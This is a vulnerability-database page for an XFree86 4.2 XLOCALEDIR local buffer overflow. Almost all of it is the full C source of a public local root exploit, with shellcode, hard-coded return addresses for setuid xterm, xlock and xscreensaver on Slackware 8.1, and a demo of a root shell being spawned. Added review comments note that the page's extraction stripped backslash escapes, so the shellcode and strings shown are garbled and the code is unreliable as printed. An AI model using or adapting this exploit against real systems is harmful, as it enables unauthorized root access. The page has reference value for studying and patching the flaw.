XFree86 4.2 – ‘XLOCALEDIR’ Local Buffer Overflow (1)
漏洞ID | 1053736 | 漏洞类型 | |
发布时间 | 2003-03-03 | 更新时间 | 2003-03-03 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7002/info
Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.
A local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered.
/****
***
** oC-localX.c - XFree86 Version 4.2.x local root exploit
** By dcryptr && tarranta / oC
***
** Tested against: Slackware 8.1
***
** This bug was found by tarranta and dcryptr 3 january 2003.
** It's a strcpy in the xf86 libraries that we exploit, using
** the bug to get the root privileges. If you put too much data
** in the XLOCALEDIR environment variable all programs using this
** library will cause a segmentation fault. Some weird reason makes
** the program not execute the first 8 bytes of the shellcode.
***
** Demonstration - here we use xlock as the target
** ----------------------------------------------
** martin@gDeU56:~$ ls -l /usr/X11R6/bin/xlock
** -rws--x--x 1 root bin 2193628 May 30 2002 /usr/X11R6/bin/xlock
** export XLOCALEDIR=`perl -e 'print "A" x 6000'`
** martin@gDeU56:~$ xlock
** Segmentation fault
** eip 0x41414141 0x41414141
**
** Exploitation:
** martin@gDeU56:~$ ./oC-XFree86-4.2.0 -t 2
** --- XFree86 Version 4.2.0 / X Window System - local root exploit ---
** [+] by: dcryptr && tarranta
** [+] oC-2003 - http://crionized.net/
** [+] attacking: /usr/X11R6/bin/xlock
** [+] using ret: 0xbfffe86d
** [+] spawning root shell!!!!
** sh-2.05a# id;uname -a
** uid=0(root) gid=0(root) groups=100(users)
** Linux gDeU56 2.4.18 #4 Fri May 31 01:25:31 PDT 2002 i686 unknown
***
** Remember that there is more than one suid file using this lib.
** /usr/X11R6/bin/xterm
** /usr/X11R6/bin/xscreensaver
***
** This may be vulnerable in other distros!!!
** We are currently making out new targets. look on our page
** for the newest version!
***
** (C) COPYRIGHT oC 2003
** All Rights Reserved
*******************************************************************************************************
** GREETS: dgram, lonely_, upstream, evilrip
***
****/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/errno.h>
#define VERSION "0.9"
/* 57 bytes shellcode by dcryptr */
/*
 * NOTE(review): as reproduced on this page every "\x" escape has lost its
 * backslash, so these literals are plain ASCII text ("x31xdb...") rather
 * than the byte values the trailing mnemonics describe. main() copies the
 * array with strlen(), so what actually lands in the buffer is that text.
 * The header comment above says the first 8 bytes (the first setuid block)
 * are never executed, which is why it appears twice.
 */
static char shellcode[] =
/* setuid(0); (ignored) */
"x31xdb" /* xor %ebx,%ebx */
"x89xd8" /* mov %ebx,%eax */
"xb0x17" /* mov $0x17,%al */
"xcdx80" /* int $0x80 */
/* setuid(0); */
"x31xdb" /* xor %ebx,%ebx */
"x89xd8" /* mov %ebx,%eax */
"xb0x17" /* mov $0x17,%al */
"xcdx80" /* int $0x80 */
/* setgid(0); */
"x31xdb" /* xor %ebx,%ebx */
"x89xd8" /* mov %ebx,%eax */
"xb0x2e" /* mov $0x2e,%al */
"xcdx80" /* int $0x80 */
/* /bin/sh execve(); */
"x31xc0" /* xor %eax,%eax */
"x50" /* push %eax */
"x68x2fx2fx73x68" /* push $0x68732f2f */
"x68x2fx62x69x6e" /* push $0x6e69622f */
"x89xe3" /* mov %esp,%ebx */
"x50" /* push %eax */
"x53" /* push %ebx */
"x89xe1" /* mov %esp,%ecx */
"x31xd2" /* xor %edx,%edx */
"xb0x0b" /* mov $0xb,%al */
"xcdx80" /* int $0x80 */
/* exit(0); */
"x31xdb" /* xor %ebx,%ebx */
"x89xd8" /* mov %ebx,%eax */
"xb0x01" /* mov $0x01,%al */
"xcdx80"; /* int $0x80 */
/*
 * One row of the target table below. Every field is consumed by main():
 *   index   - the number printed in the "-t 0" listing and passed as -t
 *   distro  - free-text description shown in that listing
 *   dest    - absolute path handed to execl()
 *   name    - argv[0] given to the executed program
 *   retaddr - value that main() repeats through the XLOCALEDIR buffer
 *             (hard-coded for the one build named in distro; not portable)
 *   LEN     - number of bytes of that buffer main() fills
 */
struct target {
int index;
char *distro;
char *dest;
char *name;
u_long retaddr;
int LEN;
};
/*
* There is like 200+ binaries that segfaults to this
* vuln but they are not suids. this is all the suids
* I found. Soundtracker is a music tracker that I am
* using and its vuln too.
*/
/*
 * Target table: main() selects row type-1 for "-t <type>" (1..3) and walks
 * the rows for "-t 0". The final all-zero row is the sentinel; the listing
 * loop stops at the first row whose dest is NULL. All rows here are for a
 * single distribution build, and retaddr is a fixed stack address for that
 * build -- no run-time discovery is done.
 */
struct target exploit[] = {
{ 1, "Slackware 8.1 -", "/usr/X11R6/bin/xterm",
"xterm", 0xbfffe86d, 6000 },
{ 2, "Slackware 8.1 -", "/usr/X11R6/bin/xlock",
"xlock", 0xbfffe86d, 6000 },
{ 3, "Slackware 8.1 -", "/usr/X11R6/bin/xscreensaver",
"xscreensaver", 0xbfffe86e, 6000 },
{ 0, NULL, NULL, NULL, 0, 0 }
};
/* Prints the banner and option summary to stderr; defined after main(). */
void usage(char *cmd);
/*
 * Entry point. Parses -h / -t <num>, picks a row of exploit[], builds an
 * oversized XLOCALEDIR value and execs the chosen setuid binary with it set.
 * The whole program is i386-specific: it assumes sizeof(long) == 4 and a
 * fixed stack layout (see the retaddr comment in struct target).
 * Returns 0 only if execl() somehow returns without error (it never does on
 * success, since the process image is replaced); exits with -1 if execl()
 * fails, 0/1 on the help and list paths.
 */
int main(int argc, char **argv)
{
int i;
/* NOTE(review): only assigned in the 't' case. If argc > 1 but no -t is
 * given (e.g. a stray positional argument), exploit[type-1] below reads an
 * uninitialised int, which is undefined behaviour. */
int type;
int size;
int options;
long retaddr;
/* Sized to the largest LEN in exploit[]; filled below in 4-byte strides. */
char buffer[6000];
if(argc == 1) {
usage(argv[0]);
exit(0);
}
/* options of this exploit */
while((options = getopt(argc, argv, "ht:")) != EOF) {
switch(options) {
case 'h':
usage(argv[0]);
exit(0);
case 't':
/* atoi() gives no error indication: a non-numeric argument becomes 0,
 * i.e. the "list targets" path rather than an error. */
type = atoi(optarg);
/* 1..3 index exploit[] as type-1; 0 lists the table. The upper bound is
 * hard-coded rather than derived from the table length. */
if (type > 3 || type < 0) {
printf("Out of range!!n");
exit(0);
}
if (type == 0) {
usage(argv[0]);
printf("num . descriptionn"
"----+----------------------------------------n");
for (i = 0; exploit[i].dest; i++)
fprintf(stderr, "[%d] | %s %sn", exploit[i].index, exploit[i].distro, exploit[i].dest);
exit(1);
}
break;
default:
usage(argv[0]);
exit(0);
}
}
size = exploit[type-1].LEN;
retaddr = exploit[type-1].retaddr;
/* The "n" at the end of each literal below is a newline escape whose
 * backslash was lost in the page extraction. */
fprintf(stderr, "n--- oC-localX "VERSION" - XFree86 Version 4.2.0 local root exploit ---n"
"[+] by: dcryptr && tarrantan"
"[+] oC-2003 - http://crionized.net/n"
"[+] attacking: %sn"
"[+] using ret: 0x%8lxn"
"[+] spawning shell!!!!n", exploit[type-1].dest, retaddr);
/* Repeat retaddr across all `size` bytes. The stride of 4 with a `long`
 * store assumes ILP32; on an LP64 host the store at i == 5996 writes 8
 * bytes and runs past the end of buffer. Note also that no NUL terminator
 * is written (every byte of retaddr is non-zero), so the setenv() below
 * reads past buffer looking for one. */
for (i = 0; i < size; i += 4)
*(long *)&buffer[i] = retaddr;
/* NOTE(review): as printed on this page shellcode[] has lost its "\x"
 * escapes, so this copies ASCII text, not the instructions described. */
memcpy(buffer + 1, shellcode, strlen(shellcode));
/* This is the only input the target ever sees. The defect is on the other
 * side of the exec: the library copies XLOCALEDIR into a fixed-size buffer
 * without checking its length (BID 7002 text above). The fix belongs there --
 * a bounded copy / length check -- and, more generally, a setuid program
 * should not trust path-like environment variables from its caller. */
setenv("XLOCALEDIR", buffer, 1); /* setting env variable */
if ( (execl(exploit[type-1].dest, exploit[type-1].name, NULL)) == -1) {
fprintf(stderr, "Try another target, you scriptkid!nn");
exit(-1);
}
return(0);
}
/*
 * Writes the banner and the option summary to stderr.
 * @param cmd  the invoking command name (argv[0]), shown in the usage line.
 * Output is byte-identical to the single fprintf() form: the banner carries
 * no conversion specifiers, so it is emitted with fputs() and only the usage
 * part goes through fprintf(). (The trailing "n"/"t" in these literals are
 * escape sequences whose backslashes were lost in the page extraction.)
 */
void usage(char *cmd)
{
	/* banner: tool/version line followed by the credits */
	fputs("n--- oC-localX "VERSION" - XFree86 Version 4.2.0 local root exploit ---n"
	      "by dcryptr && tarrantan"
	      "oC-2003 - http://crionized.net/nn", stderr);
	/* option summary; the only part that interpolates the command name */
	fprintf(stderr,
	        "usage: %s [-h] [-t <num>]n"
	        "__optionsn"
	        " -ht- this helpn"
	        " -t numt- choose target (0 for list)nn", cmd);
}